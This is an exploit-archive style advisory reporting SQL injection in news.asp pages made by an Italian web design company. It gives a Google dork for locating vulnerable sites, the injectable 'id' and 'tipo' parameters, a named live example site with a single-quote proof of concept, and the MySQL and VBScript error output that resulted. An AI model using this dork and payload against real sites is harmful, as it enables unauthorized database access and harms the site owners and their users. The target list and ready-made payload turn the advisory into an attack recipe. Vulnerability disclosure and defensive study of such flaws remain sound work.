#################################################################################################
# Exploit Title : Web Design RGB Multimedia Perugia Italy SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 04/06/2018
# Vendor Homepage : rgbmultimedia.com
# Social Media Link : facebook.com/RGBmultimedia/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Google Dork : intext:''Web Design RGB Multimedia Perugia - Italy''
# Exploit : /news.asp?id=[SQL Injection]
# Exploit : /news.asp?tipo=[SQL Injection]
#################################################################################################
# Example Site => praline-project.eu/news.asp?id=39' => [ Proof of Concept ] => archive.is/wTbmA
# SQL-DB Error =>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-5.5.58-38.10-log]You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near '' and (attivo = 1 or false)' at line 1
/news.asp, line 91
Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "2'"]'
/news.asp, line 160
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################